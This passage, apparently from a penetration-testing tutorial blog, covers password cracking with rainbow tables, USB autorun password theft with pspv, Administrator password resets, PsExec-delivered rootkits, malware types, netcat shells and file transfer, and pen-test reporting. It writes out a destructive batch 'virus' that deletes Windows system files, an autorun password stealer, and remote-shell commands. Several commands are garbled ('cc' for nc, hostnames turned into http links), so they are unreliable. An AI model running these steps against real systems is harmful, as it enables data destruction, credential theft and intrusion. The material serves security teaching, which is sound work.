Once all the outcomes have been generated, the attacking party can capture the hash of a password as it moves over the network, comparing it afterward to the list of hashes that have generated, quickly finding a match and retrieving the password itself.
The major drawback of rainbow tables is that they take a considerable amount of time to generate and as such it is not an attack that can be carried out without the setup beforehand. Another downside of rainbow tables is the lack of ability to crack passwords of unlimited length because generating passwords of increasing length takes increasing amounts of time—more complex rainbow tables must be generated to account for the increased password lengths.
Let’s create a rainbow table to see what the process entails. In most cases, you may not even have to create a rainbow table yourself, and in fact, you may be able to download one instead. Note that on newer versions of Windows, you may need to run the application with administrative privileges.
1. Start the winrtgen.exe tool.
2. Click the Add Table button.
3. In the Rainbow Table Properties window, select NTLM from the Hash drop-down list.
4. Set Minimum Length as 4 and Maximum Length as 9, with a Chain Count of 4000000.
5. Select loweralpha from the Charset drop-down list 4.
6. Click OK.
Windows will begin creating the rainbow table. Note that the creation of the actual rainbow table file will take a serious amount of time depending on the speed of your computer and the settings you chose.
Once these two steps have been performed, we must go about recovering the password.
Once you have created the rainbow table, you can use it to recover a password using the information from pwdump and WinRTGen.
1. Double-click rcrack_gui.exe.
2. Click File Add Hash to open the Add Hash window.
3. If you performed the pwdump hands on, you can open the text file created and copy and paste the hashes in this step.
4. Click OK.
5. Select Rainbow Table from the menu bar, and click Search Rainbow Table. If you performed the WinRTGen hands-on from earlier, you can use that rainbow table here.
6. Click Open.
Although rainbow tables are an effective means of breaking passwords, they can be defeated. This means you should salt the password prior to the hashing process.
A salt is a way of adding pseudo-random values prior to the hashing process, resulting in different and unique outputs. The salt is added to the original password and then hashing is performed. Rainbow tables perform one type of what we know as cryptanalysis in order to thwart this analysis. We can make it tougher by adding in this randomness.
Using Nontechnical Methods
Remember, you don’t always need to actively break a password to get a password—there are other methods.
Though not really a method, using default passwords is a way of obtaining passwords. Default passwords are those that are set by the maker of a device or piece
You may want to keep this list of default pass-word websites handy; using it is an easy way to gain entry into many systems. You may find that default passwords are something you wish to attempt during the enumeration process. These passwords are always meant to be changed by the customer when they receive the device and set it up. The problem is that not all users take this step and end up leaving the default setting in place. Here are some sites that have collected default passwords:
This is about as low-tech an attack as you can get, but it does work. Guessing a password manually can yield results, especially in those environments where password policies are not present or enforced.
Guessing can work typically by following a process similar to the following:
1. Locate a valid user.
2. Determine a list of potential passwords.
3. Rank possible passwords from least to most likely.
4. Try passwords until access is gained or options are exhausted.
Stealing Passwords with Flash Drives
The flash drive is another way to steal passwords or other data from a system. Basically, this process involves embedding a script or program (or both) on a flash drive before plugging the device into a target system. Since many users store their passwords for applications and online sites on their local machine, that information may be easily extracted using the script.
In this exercise, we will attempt to extract passwords from a system using NirSoft’s pspv utility. pspv.exe is a protected storage password viewer that will display stored passwords on a Windows system if they are contained in Internet Explorer or other Microsoft-based applications. It is guaranteed to work on Windows Vista and 7, with limited success on Windows 8 and higher.
1. Copy the utility to the USB drive.
2. Create a Notepad file called launch.bat with the following lines in the file: [autorun] en = launch.bat
3. After creating the file, save it to the USB drive.
4. Open Notepad and create the following lines: Start pspv.exe /s passwords.txt
5. Save launch.bat to the USB drive.
At this point, the USB drive can be inserted into a target computer. Once inserted into a victim PC, pspv.exe will run and extract passwords and place them in the passwords.txt file, which can be opened in Notepad.
Note that this type of attack requires something else to be in place to make it successful: physical access. With physical access to a system, it is possible to carry out a wide range of attacks, and USB-style attacks are just the beginning. The unaware user most likely will plug the USB device into a computer out of curiosity.
Another way of stealing passwords via USB is through the use of a device known as the USB Rubber Ducky from Hak5. This piece of hardware can be plugged into a USB port, but instead of identifying as a storage device it shows up as a keyboard. Since most operating systems will not block the installation of human interface devices, the device will be recognized and any scripts on it can be configured to do any sort of action.
Micro SD Storage 60 MHz 32-Bit CPU
Replay Button Covert Case
Type A Plug
Once an account has been compromised and its password cracked, the next step is doing something with these new privileges. This is where privilege escalation comes in. Privilege escalation is the process where the access that is obtained is increased to a higher level where more actions can be carried out. The reality is that the account you’ll access typically will end up being a lower privileged account and therefore one with less access. Since you will most likely inherit an account with lower privileges, you will need to increase them somehow.
Privilege escalation can take one of two forms: horizontal and vertical escalation. Vertical escalation is when an account is compromised and the privileges of that account are increased to a higher level. A horizontal escalation is when an account is compromised and then another account with higher privileges is escalated using the abilities of the first account.
Each operating system includes a number of accounts preconfigured and installed. In the Windows operating system, users such as the administrator and guest are already present on the system in every case. Because it is easy to extract information about the accounts that are included with an operating system, additional care should be exercised to guarantee that such accounts are secure.
One way to escalate privileges is to identify an account that has the access desired and then change the password. Several tools offer this ability, including the following:
Active@ Password Changer Trinity Rescue Kit
Windows Recovery Environment (WinRE) Kali Linux
One of these tools, the Trinity Rescue Kit (TRK), is a Linux distribution that is specifically designed to be run from a CD or flash drive. TRK was designed to recover and repair both Windows and Linux systems as well as perform some system functions such as resetting passwords and escalating privileges. Once TRK is in the environment, a simple sequence of commands can be executed to reset the password of an account.
The following steps change the password of the Administrator account on a Windows system using TRK:
1. At the command line, enter the following command: winpass -u Administrator
The winpass command will then display a message similar to the following: Searching and mounting all file system on local machine
Windows NT/2K/XP installation(s) found in:
1: /hda1/Windows Make your choice or 'q' to quit :
2. Type 1 or the number of the location of the Windows folder if more than one install exists.
3. Press Enter.
4. Enter the new password or accept TRK’s suggestion to set the password to a blank.
5. You will see this message: “Do you really wish to change it?” Type Y and press Enter.
6. Type init 0 to shut down the TRK Linux system.
Retaining Access with Backdoors and Malware
Once you have gained access to the system, the next step is carrying out the main part of your attack. This stage can involve running applications, modifying the system, or even jumping onto other systems as well as mapping and moving around the network. You’ll also need to retain access by installing backdoors and malware.
In this blog section, you’ll learn how to:
Pick an attack
Install a backdoor Open a shell
Launch a virus, worms, and spyware Insert Trojans
Install a rootkit
Deciding How to Attack
Once you have the opportunity to execute applications or do anything on the compromised system, the decision is up to you what you will do. Backdoors are meant to open up an alternative means of gaining access to a system, in a way that gets around security measures. Backdoors can come in the form of rootkits, Trojans, or other similar types.
Applications of this type are designed to compromise the system in such a way as to allow later access to take place. An attacker can use these backdoors to later attack the system. Malware is any type of software designed to capture, alter, or compromise the system. This will be something we specifically focus on later in this blog. Keyloggers are software or hardware devices used to gain information entered into the keyboard.
Installing a Backdoor with PsTools
There are many ways to plant a backdoor on a system, but let’s look at one provided via the PsTools suite. The PsTools suite is a collection of tools made available by Microsoft that allows for a number of operations to be performed. Included in this bundle of tools is the utility PsExec, which can execute commands remotely on a target system. The big benefit of this tool is that no installations are needed on the victim system, only the ability to copy the file to the local system before it can be used.
Let’s take a look at some of the commands that can be used with PsExec. The following command launches an interactive command prompt on a system named \\kraid: psexec \\kraid cmd
This command executes ipconfig on the remote system with the /all switch and displays the resulting output locally: psexec \\kraid ipconfig /all
This command copies the program rootkit.exe to the remote system and executes it interactively: psexec \\kraid -c rootkit.exe
This command copies the program rootkit.exe to the remote system and executes it interactively using the administrator account on the remote system: psexec \\kraid -u administrator -c rootkit.exe
As these commands illustrate, it is possible for an attacker to run an application on a remote system quite easily. The next step is for the attacker to decide just what to do or what to run on the remote system. Some of the common choices are Trojans, rootkits, or backdoors.
Other utilities that may prove helpful in attaching to a system remotely are RemoteExec A utility designed to work much like PsExec, but it also makes it easy to restart, reboot, and manipulate folders on the system.
VNC (various versions) This is a basic screen sharing software and is a common and well-known tool. It has proven popular for a number of reasons, such as the fact that it is lightweight and easy to use.
Opening a Shell with LAN Turtle
One other item that I think should be mentioned is something known as the LAN Turtle by Hak5. This utility is disguised as a simple USB Ethernet adapter, but in reality, it is something far more dangerous. The LAN Turtle allows you to perform several attacks such as man-in-the-middle and sniffing, among many others.
One of the more powerful attacks is the ability to open a remote shell on a system. Opening a shell on a system allows you to send commands and perform tasks on a remote system through a command-line interface. Additionally, the tool allows you to set up VPNs all nicely wrapped up in a small form factor package.
Recognizing Types of Malware
Malware has quickly become one of the leading problems plaguing modern technology, with several million new forms of malware created every year (by some estimates, some 1,200 new pieces are created each hour).
Using or creating malware during a penetration test can be helpful, but it can also be a very dangerous tool if used incorrectly. For example, using a piece of malware to test an antivirus or open up backdoors on a system can be useful, but if the backdoors happen to spread outside the intended target area and infect other systems not being tested (or even other companies, for that matter), things can go bad really quick.
In today’s world, this type of issue could easily land you in trouble with the law, not to mention the inevitable loss of credibility you may experience. Keep in mind that penalties for infecting systems that aren’t part of your testing area could result in fines or even prison time in some cases.
As stated earlier, not all malware is the same. The term malware is a catch-all term covering a whole family of malicious software. Stated in broad terms, malware is anything that consumes resources and time while providing nothing in return and uses those resources to perform some operations counter to the system owner’s best interests. To better visualize what malware is, let’s examine the types before we delve deeper into the mechanics of each:
Viruses are designed to replicate and attach themselves to other files on a target system. Viruses require a host program to be run to start the infection process. Viruses as a type of malware have existed since the early 1970s, even before the name computer viruses was coined.
Worms This form of malware has existed in various forms since the late 1980s. While the first generation of worms was not nearly as dangerous as the ones encountered today, but they were nonetheless harmful. The early generation may not have been as formidable, but they did still exhibit the same characteristics, namely their ability to rapidly multiply and spread without any interaction from a user.
Spyware Designed to gather information about a user’s activities in a stealthy manner.
Trojan Horses Any type of malware in this category is very similar to viruses; however, they use social engineering to entice a user to activate them. Wrapping malware inside of something that the user wants increases the chances that the user will execute the malware and thus cause an infection.
Rootkits are one of the more modern forms of malware that are able to hide within the hardware or software of a system. What makes this type of mal-ware more devastating is that they can be nearly impossible to detect because they infect at the kernel level of the system. Antimalware software, for the most part, does not have access to the kernel or to the other applications on the system.
Cryptoviruses/ransomware This is a new type of malware that is designed to locate and encrypt data on a victim’s hard drive with the intention of holding them for ransom. Once the victim is infected, they are presented with a message that states they need to pay a certain amount to get the key to unlocking their files. We won’t cover cryptoviruses further in this blog.
A virus is the oldest form of malware and is by far the most well-known of all the types of malware. What is a virus, though? What is it that separates a virus from all the other types of malware?
Life Cycle of a Virus
Simply put, to be classified as a virus the malware must exhibit that it is a self-replicating application that attaches itself to and infects other executable programs. Many viruses affect the host as soon as they are executed; others lie in wait, dormant, until a predetermined event or time, before carrying out their instructions.
What can you expect a virus to do once the infection has started?
Infect other programs Replicate
Transform itself into another form Alter configuration settings
Corrupt or destroy hardware
So why do viruses get created? Well, narrowing it down to one specific reason is tough, but some of the more common ones are to steal information, to damage equipment and software, impact a company’s reputation, perform identity theft, or (in some cases) just because.
When pentesting, you may find that creating a virus is something that is useful to test defenses such as software and policies. However, just a word of caution before going too far, and this advice goes for viruses as well as all types of malware: if you are going to use such tools during a test, take precautions to make sure it does not spread beyond your target.
If you do end up spreading it beyond your intended target, the result could be severe legal penalties and the end of your career. It is better to use malware in a testing environment rather than production, just to play it safe.
Creating a virus is a process that can be very complicated or something that happens with a few button clicks. Advanced programmers may choose to code the malware from scratch. The less savvy or experienced may have to pursue other options, such as hiring someone to write the virus, purchasing code, or using an “underground” virus-maker application. Finally, at the most basic level, it is even possible to grab the prebuilt code and use it as is.
To complete this exercise, you will need to use Notepad and obtain a copy of Bat2Com from the Internet.
Before you do this exercise, here’s the disclaimer. Do not execute this virus. This exercise is meant to be a proof of concept and this is for illustrative purposes only. Executing this code on your system could result in damage to your system that may require extensive time and skill to fix properly.
1. Create a batch file called virus.bat using Windows Notepad.
2. Enter the following lines of code: @echo off Del c:\windows\system32\*.* Del c:\windows\*.*
3. Save virus.bat.
4. From the command prompt, use Bat2Com to convert virus.bat into http://virus.com.
Of course, to create more complicated viruses you need only look as far as the Internet and search for virus creation kits or virus software development kits (SDK). Doing so will yield a plethora of results from a number of different sources. Although I cannot document each of these packages individually here, I can say that each offers different options and capabilities that you can explore. However, if you are going to delve into the world of virus creation toolkits, I warn you to be careful and consider running them on an isolated or standalone system.
Types of Virus
When talking about viruses, it is important that you have an understanding that not all viruses are created equal. You should understand that there are different types even if you don’t memorize all the forms they can take. Knowing the different forms of a virus can be helpful for troubleshooting and diagnosis later.
With that, let’s get started.
Boot Sector Virus Viruses of this type specifically target the boot sector of a drive or the location where boot information is stored by several operating systems. This type of viruses first appeared back in the MS-DOS days, but they still are alive and well and show up from time to time.
Browser Hijacker This is a relative newcomer on the scene that propagates by taking advantage of vulnerabilities or functions contained within a web browser. These viruses are known to do anything from changing the home page to forcefully downloading other things onto a victim’s computer.
File Infector Virus This type of virus is one of the most common ones seen in the wild. To be classified as a file infector virus, the infector must embed itself in a file and then wait for that file to be executed. The difference between this virus and direct action types is that this type overwrites or does other damage to the host file.
Macro Virus This type of malware uses the macro languages built into Microsoft Office applications as well as others. The danger with this virus is that it can be embedded into a harmless document waiting for that document to load and execute the macro.
Multipartite Virus This type of virus is particularly nasty as it spreads by using multiple methods at once. The method of infection can vary depending on applications, OS version, and even how the author intended the virus to operate.
Polymorphic Virus To fit into this category, a virus will need to rewrite itself over again and again over a period of time. By taking this action, the virus becomes much harder to detect because it will not look the same if it is caught again. Some of the more advanced derivations of this type of virus will even employ encryption to hide their activities.
Resident Virus This broad virus definition applies to any virus that runs and then loads itself into memory, waiting to infect files that match what it is looking for.
Web Scripting Virus Many websites execute complex code in order to provide interesting content. Of course, this code can sometimes be exploited, making it possible for a virus to infect a computer or take actions on a computer through a website.
Encrypted Viruses This type of virus consists of a payload which is paired with an encryption engine which is used to encrypt the whole virus package. The viruses use encrypted code techniques that make it difficult for antivirus software to detect them.
Email Virus This is a virus spread via email. Such a virus will hide in an email and when the recipient opens the mail the payload will execute and cause its damage.
Logic Bombs These are not considered viruses because they do not replicate. They are not even programs in their own right but rather camouflaged segments of other programs. Their objective is to destroy data on the computer once certain conditions have been met. Logic bombs go undetected until launched, and the results can be destructive.
Nowadays when the topic of viruses comes up, the subject of worms is just around the corner. Unlike their virus cousins, which require a host program to start their dirty work, worms just need a system to be vulnerable to start their own self-replicating process. Making the problem even worse is that worms can replicate on their own and leverage the speed and ease of networks to spread quickly.
One oft-cited worm is the Slammer worm from about a decade ago. When it was active, the worm spread so fast and so effectively that it was responsible for widespread outages and denials of service. Although a patch was released six months prior for vulnerable systems, many system administrators failed to apply it.
Our next type of malware is known as spyware, which is specifically intended to collect information for a third party. This type of software operates in the background and out of a user’s sight, quietly collecting information and transmitting it to its creator. What is collected can be used to target ads, steal identities, generate revenue, alter systems, and capture other information. Additionally, spyware may only be the first wave of attack and open the door to later attacks once the creator knows more about you.
This type of malware can find its way onto a system using any of a number of methods; however, we will only concentrate on a few in this blog.
Methods of infection include any of the following:
Torrent Sites The old adage of “You don’t get something for nothing” is very true on file-sharing networks. While not every piece of software or file on popular torrent and file sharing sites are infected with malware of some kind, it is still more common than many would assume.
Instant Messaging (IM) Instant messaging software has traditionally been designed with openness in mind and not any real form of security. While things have gotten better, the sending of malicious links and such is still possible and still capable of infecting a victim.
Email Attachments Emails are not only a vital part of today’s communication but they have also proven quite the effective mechanism for delivering mal-ware of all types. Embedding a malicious link or attaching a file to an email has been considered effective in combination with a phishing attack.
Physical Access If an attacker gets physical access to a system, it is easy to infect. Popping in a flash drive or plugging in a hardware keylogger can be done in only a moment or two. This can be accomplished by planting a USB device in a high-traffic area where a curious worker may plug it into a system to see what is on it.
Browser Add-ons Many users forget or do not choose to update their browsers as soon as updates are released, so the distribution of spyware becomes easier. Websites Many websites have employed a tactic known as drive-by downloading, where simply visiting a site is enough to infect a system. This is commonly done through flash animations or scripting of all types.
Another interesting distribution mechanism for malware has come from hardware manufacturers themselves. For example, in early 2015 Lenovo was found to be shipping a piece of malware known as SuperFish preinstalled on many of its computers. This malware was specifically designed to spy on and learn a user’s browsing habits and then present content specifically targeted to their interests.
While the malware may seem irritating but not particularly harmful, consider the fact that the software was found to intercept and remove the security from supposedly secure connections. Once the software was made public, Lenovo had to come clean and admit the software existed and release instructions for its removal.
Not too long after Lenovo suffered a public relations issue with SuperFish, Dell computers also had a similar problem with a SuperFish-like malware on their hardware. Much like Lenovo, Dell had to deal with the fallout of having malware preinstalled on their systems. As of early 2016, both companies are facing or have faced lawsuits from upset consumers and privacy advocates in regard to SuperFish.
Let’s talk about something you can use during penetration testing: Trojans. So what is a Trojan? In simple terms, it is a piece of software designed to entice a victim into executing it by appearing as something else, typically by wrapping itself up in another program as a carrier. By using another program as its carrier, it relies on what is known as social engineering or taking advantage of human behavior, to carry out its infection.
Once on a system, its goals are similar to those of a virus or worm: to get and maintain control of the system or perform some other task.
Why would you choose to deploy a Trojan instead of an actual virus or another item? The primary reason is that they are typically stealthy and therefore can elude detection, coupled with the fact that it can perform a wealth of actions behind the scenes that may be more obvious when performed by other means.
So what is a way to detect a Trojan? Well, one way is to determine if the Trojan is contacting another system by opening up connections to another system. You can do this through the use of netstat. This tool is included with the Windows operating system and can be used to perform a number of tasks—in this case, to detect open communication ports.
To use netstat, follow these steps:
1. Open a command prompt.
2. At the command line, enter netstat –an.
3. Observe the results.
On most systems, you will see a number of ports open and listening, but the type and number will vary depending on the system and what is running. In practice, you would look at the results with an eye toward anything that may be unusual and require additional attention. Netstat is a powerful tool, but one of its shortcomings is the fact that it is not real time and must be rerun to get current results. However, if you wish to view results in real time, an option available to you is TCPView.
If you do not already have TCPView, you can download it for free from Microsoft - Official Home Page.
To use TCPView, follow these steps:
1. In Windows, run the tcpview.exe executable.
2. Observe the results in the GUI.
3. With TCPView still running, open a web browser, and go to www.xyz.com In TCPView, notice the results and that new entries have been added.
5. In the browser, go to YouTube (or some other site that streams video or audio), and play a video or piece of content.
6. In TCPView, watch how the entries change as ports are opened and closed. Observe for a minute or two, and note how the display updates.
7. Close the web browser.
8. In TCPView, observe how the display updates as some connections and applications are removed.
When using TCPView, you can save snapshots of the screen contents to a TXT file. This feature is extremely helpful for investigation and later analysis of information, and potentially for incident-management purposes later.
Working with Netcat
Let’s get down to business with one of the most popular tools used for network administration but also used as a Trojan in some cases. Netcat is an application that was created to be a network analysis tool. It can be used to open up TCP and UDP connections between two machines over any port desired. It can also be used as a port scanning tool, similar to nmap, in a pinch if needed or if other methods are proving ineffective.
In addition, Netcat can be useful for allowing a connection to be opened to a remote system. If netcat is used on its own, it can be effective at allowing the opening of a remote shell on a system. However, if netcat is bundled within another executable, it can be used as a Trojan and delivered to a target.
Netcat is made up of one executable that can be configured to be run both as a client and as a server depending on whatever your particular goals may be. Usually, the process of using netcat would involve getting it onto a victim system and then using a client to attach to the system and issue commands to the host (which you could do by creating a Trojan or other mechanism to deploy the software onto a victim system). It is also possible to get the software onto a victim system simply through pure social engineering methods such as phishing.
For our purposes, you will assume that the netcat software is present on the client and that you have free access to the “victim” system to install and configure the netcat software at will. You will also assume that both the client and server are Windows-based, though the commands here (much like netcat) will work on Windows, Linux, and Unix platforms.
The power of netcat is unlocked by first understanding its syntax and how it functions. First, netcat functions by opening up TCP connections to a host for the purpose of communication with the remote system. These connections to a remote system can be used to perform a wide range of operations, but those operations start by using a fairly easy-to-understand structure or syntax, like so: cc [options] <host address> <port number>
This command will send a request to a remote system defined in the host address and port number much in the way Telnet does.
It is also possible to make UDP connections to a host if an additional level of stealth is required. To use UDP-based connections, simply issue the following command:
cc -u <host address> <port number>
With an understanding of this basic syntax, it is possible to use netcat to perform something that you executed earlier, namely a port scan. How would you do this? By issuing the following command:
nc -z -v <host address> 1-1000
This command will scan all the ports from 1 to 1000. The -z option tells netcat not to attempt a connection, therefore lowering chances of detection. Finally, the -v option tells netcat to be verbose and therefore provide more information about the actions it is performing.
The output will look similar to the following:
nc: connect to http://zebes.com port 1 (tcp) failed: Connection refused
nc: connect to http://zebes.com port 2 (tcp) failed: Connection refused
nc: connect to http://zebes.com port 3 (tcp) failed: Connection refused
nc: connect to http://zebes.com port 4 (tcp) failed: Connection refused
nc: connect to http://zebes.com port 5 (tcp) failed: Connection refused
nc: connect to http://zebes.com port 6 (tcp) failed: Connection refused
nc: connect to http://zebes.com port 7 (tcp) failed: Connection refused
. . .
Connection to http://zebes.com 22 port [tcp/ssh] succeeded!
. . .
The scan will provide a lot of information, but when finished you will have an idea of what ports are open or closed on a target.
Now think of deploying netcat to a system as a Trojan. Once the victim has unknowingly installed the software on their system, it is possible to use the technique here to scan other hosts on the victim’s own network. You will see how to do this in just a moment.
Much like Telnet, net-cat does not encrypt or take other actions to protect its communications and therefore eavesdropping and detection is possible. The messages returned are sent to standard error. You can send the standard error messages to standard out, which will allow you to filter the results easily.
Talking with Netcat
Netcat is definitely not a one-trick pony and can do much more, such as communicating between hosts. Netcat gives us the opportunity to connect two instances of netcat in a client-server relationship and communicate.
Which computer acts as the server and which one is the client is made during the initial configuration, and then you’re ready to go. After the connection is established, communication is exactly the same in both directions between the two points. To do this type of communication, you must perform a couple of steps. First, you need to define the client, which can be done by issuing the following command: nc -l 4444
This configures netcat to listen for connections on port 4444. Next, on a second machine initiate a connection by issuing the following command: netcat http://zebes.com 4444
On the client, it will look as if nothing has happened because no command windows open up. However, once the connection is successful you will receive a command prompt on your system, from which you can issue commands to the remote host. When finished passing messages, simply press Ctrl+D to close the connection.
Sending Files through Netcat
Building on the previous example, you can accomplish more useful tasks. Let’s see how you can transfer files to a remote host, which could easily set up something more serious later. Because you establish a standard TCP connection, you can transmit any kind of information over that connection—in this case, a file.
To make this happen, you must first choose one end of the connection to listen for connections. However, instead of printing information onto the screen, as you did in the last example, you will place all of the information straight into a file: netcat -l 4444 > received_file
On the second computer, create a simple text file by typing echo "Hello, this is a file" > original_file You can now use this file as an input for the netcat connection you will establish to the listening computer. The file will be transmitted just as if you had typed it interactively:
netcat http://zebes.com 4444 < original_file
You can see on the computer that was listening for a connection that you now have a new file called received_file with the contents of the file you typed on the other computer:
Hello, this is a file
As you can see, by using netcat you can easily take advantage of this connection to transfer all kinds of things, including whole directories of information.
A rootkit is a very dangerous form of malware. This type of malware gets installed on a computer at the kernel level and can provide remote access, system information, and data information; perform spying operations; install software; and many other tasks, all without disclosing its presence to the system or the user.
Rootkits have been around since the 1990s and have evolved to become more dangerous and malicious in nature over the years. In fact the modern versions of rootkits can embed themselves so tightly into the kernel of an operating system that they can fundamentally alter the operating system’s own behaviors.
Requests from the operating system and, by extension, applications, can be intercepted and responded to with false information. Since the rootkit is typically designed to hide its processes from the operating system and system logs, it is difficult to detect and remove.
Under ideal circumstances, an attacker can place a rootkit on a system quickly and effectively, employing methods mentioned elsewhere in the blog, such as a Trojan. A user receiving the malicious content could inadvertently activate the rootkit and cause it to become installed on the system.
The process of installation can be so quick and so stealthy that no red flags will be displayed. Under other conditions, just the act of browsing the Internet and encountering an infected site is enough to cause the infection.
Once the rootkit is installed, the hacker can secretly communicate with the targeted computer whenever it is online to trigger tasks or steal information. In yet other situations, the rootkit can be used to install more hidden programs and create “backdoors” to the system. If the hacker wants information, a keylogger program can be installed. This program will secretly record everything the victim types, online and off, delivering the results to the interloper at the next opportunity.
Other malicious uses for rootkits include compromising several hundred or even hundreds of thousands of computers to form a remote “rootkit network” called a botnet. Botnets are used to send distributed denial-of-service (DDoS) attacks, spam, viruses, and Trojans to other computers. This activity, if traced back to the senders, can potentially result in legal seizure of computers from innocent owners who had no idea their computers were being used for illegal purposes.
No job is complete until the paperwork is done, and that is definitely true with the process of penetration testing a client’s network and overall environment. Upon completion of a successful test, a client will expect a report documenting the results and providing suggestions and recommendations for addressing any deficiencies found on their network.
This important part of the process will wrap up all the tasks and processes you performed into a package that will be presented to senior-level employees and technical staff in the target organization as well as kept on file for compliance and legal purposes.
A report should present the outcome of the pen testing process and include objectives, methodologies you used, vulnerabilities, successful exploitations of those vulnerabilities, recommendations, and other relevant and supporting documentation required by the client.
Reporting the Test Parameters
The first section of the report should be the planning phase or section. This section documents some of the basic points that are going to be addressed and covered by the report itself. When writing the report, you as the pen-tester will use this section as the basis for the rest of the report and will communicate essential points that need to be known right up front.
The document may borrow heavily from your initial interactions and interviews with the client. In fact, this section of the document should at least reflect some of these initial conversations with the client to set the focus for the rest of the report.
In practice, the main focus of this phase is to have an effective level of documentation representing conversations between the point of contact in the corporation on the client side and the pentester, which will focus on a number of key points:
Objectives Audience Time
These are the five most basic points for the planning phase; we’ll take a closer look at each one of these points next:
Objectives The Objectives section is an important point in the planning phase for beginning the project. In this phase, the pentester decides the specific objectives of the project and what needs to be documented.
Consider the Objectives portion of the document or report to be an executive summary of what is to follow. The section serves to help the audience in gaining a high-level understanding of the project. The Objectives section gives a quick overview of the project, project goals, the overall scope of the project, and how this report is going to help in achieving those goals.
Audience Defining the audience for a report is essential because doing so can ensure that the report is being read by the proper people and that these individuals possess the required level of understanding to make use of the information.
The pen testing report may be read by a wide range of individuals—anyone from the chief information security officer, to the CEO, to any number of technical and administrative personnel within the client organization. Who you’ve created the report for should be considered not only when writing the document but also when delivering it to ensure that the results get into the right hands: those who can make the best use of it.
Once the report is written, it is very important to ensure that it has been constructed in such a way that the audiences you define here in this section are the ones who will be able to decipher and understand it.
Time This section of the document establishes a timeline or timeframe as to when the testing took place. This section should include the start and completion times of the test. In addition, this section should include what hours and times of day the test was conducted if it was not conducted around the clock. This description of time will serve to establish that the test met its goals and was conducted under conditions that were ideal or that best represented certain operating conditions.
Classification Since the penetration test report includes highly sensitive information such as security loopholes, vulnerabilities, credentials, and system information, the report should be classified as extremely sensitive. The pentester should also make sure that the report is always handed over to a responsible person as defined by the client.
Classification of the project and report should be discussed with a contact person at the beginning of the project in order to make sure that no classified information is given to an unauthorized person. The pentester should also discuss how classified information should be documented in the report.
In today’s environment, many clients are choosing to distribute the reports digitally instead of in a traditional printed format due to the ease of distributing the report as well as the additional security options that are available. In the event that a client asks for a report in a digital format, ensure that security measures such as digital signing and encryption are used to ensure that the report hasn’t been altered and is kept confidential at all times.
Distribution management of the report plays an important role in making sure that report should be handed over to an authorized person within a proper timeline.
During the pen testing process, it is important that you keep complete notes of every action or task you perform as well as the results and motivations of each. Over time as you develop your skills, knowledge, and experience as a pentester, you will better learn what should and shouldn’t be documented or recorded.
As you become more experienced and knowledgeable as a pentester, chances are you will learn about third-party products and utilities that can help you document your steps without being too intrusive or disruptive to your work. You should at the least maintain a proof of the following actions:
Successful exploit Performed exploits
Failure in infrastructure during a pen testing process
The question is how can you maintain this information and include it in your report? Many options are available to you; here are some of the ways that you might consider recording this information for inclusion in your reports:
Screenshot Taking screenshots of both unsuccessful and successful exploits, errors, messages, or other results is necessary to document your actions. For example, after the successful completion of a given exploit, take a screenshot of the report to show the results of that exploit as well as to protect against the possibility of an exploit not working a second time.
Screenshots that show error messages, as well as other outputs, are also useful because they can be presented to the client and technical or other personnel to illustrate specific issues they need to address.
Logging Since undoubtedly a vast amount of information will be generated that will go into the logs of various applications across various systems, it makes sense that this information should be included in the report as well. What logs you choose to include as part of report will vary dramatically depending on the client, but expect to have some logs included in your documentation. Due to the sheer volume of logs that can be generated, you may find that a report in digital form may be convenient at this point.
Scripts Where appropriate, you may choose to include any self-written or other scripts that you made use of during the pen testing process. Typically this is done to illustrate certain details to technical staff or technical-oriented personnel.
Highlighting the Important Information
With every report, there will be important information relating to the structure and format of the document. In this section we will cover some of these basic items that will be included in every report outside of the actual testing data.
A report document should have the following structure:
Report cover page Report properties Report index
Executive summary List of findings
Findings in detail
You should expect to spend a large amount of time structuring this document. Let’s take a look at basic points:
Report Cover Page This is the very first page of the report, which will give basic information about the project. A typical cover page should include the following:
Project title Client name Report version
Author information Date
Report Properties This second page provides more information about people involved in the project. This page will provide the following information:
Pen testing company’s information Pentester information
Information about other people involved in the project
Report Index This section consists of a table of contents and images for easing accessibility of the content of the report:
The Table of Contents lists the main topic headings and their page numbers. The lower headings are listed as well, but including page numbers is not necessary. The Table of Figures lists each of the images used in the report along with the title and page number.
Executive Summary The Executive Summary section should be written after project completion with the goal of giving a brief description of the pen test. This section is designed for higher-level employees. It describes the methodology used, high-level findings, and organization security levels in a limited amount of text.
The Project Objectives section includes the objectives of conducting the pen test and how the test helped to accomplish those objectives.
The Scope of Project section describes permissions and limitations of the project by clearly picturing boundaries of the conducted pen test. It includes information about the target system to be tested; the type and depth of the pen test based on budget and allocated time; and limitations of the project and their effects (limitations specifically being the denial-of-service test is not allowed, or the test should be conducted during office hours only).
The Authorization section gives information about permissions for conducting the pen test. No pen test should begin before getting a proper written authorization from the client and third-party service provider. This information should be documented in the report.
Every assumption made by the pentester should be clearly mentioned in the report section because doing so will help customers understand the reason for the approaches taken during the testing. Pen testing is an intrusive process, so clearly describing an assumption will protect the pentester.
The Timeline section represents the life cycle of the pen testing process in terms of timing. This section includes the duration of the process, including when the target was tested. This section helps the pentester by clearly stating that all the findings have been discovered in the timeframe described and later in case of newly evolved vulnerabilities (any configuration changes are not a responsibility of the pentester).
The Summary of Conducted Penetration Test section gives a brief technical overview of the pen test by describing high- and medium-level findings. Only important findings should be reported and should be described within a single sentence. This section also describes the methodology used for a pen test.
List of Findings In the List of Findings area, all levels of findings are documented in a tabular form to provide quick information about security vulnerabilities in the targeted system. The list of findings can be divided according to the conducted test.
So if the pen test targeted web applications, IT infrastructure, and mobile applications, a separate list of findings can be created for every tested environment. If a huge IT infrastructure test was conducted, then a small list of findings can be created by including only high- and medium-level vulnerabilities and a complete list can be included in each respective section.
The Findings in Detail section features suggested recommendations on which the complete remediation will be based. This area will be read by people dealing directly with IT/information security and IT operations. So the pentester is free to write everything related to exploits in technical terms. This area includes the following details:
In the Definition of Vulnerability section, a base of performed exploits is established by providing detailed information about vulnerabilities. Explanations should be directly based on the environment in which the pentester has worked. The pentester can recommend an appendix and references area for gathering more information.
In the Vulnerability section, the pentester should describe the root cause of the vulnerability by highlighting the assessed environment. For example, in the case of SQL injection in a login page, the pentester should mention that the username field is vulnerable for certain types of SQL injection attacks and list those types rather than just giving a rough idea that the login page is vulnerable to SQL injection attacks and then leaving the customer to solve the puzzle.
In the Proof of Concept area, the pentester provides a proof of concept of the exploits performed. In most cases, screenshots or out-comes of the exploits suffice. For example, in the case of a cross-site scripting attack, the attack vector and a screenshot of the outcome should be more than enough.
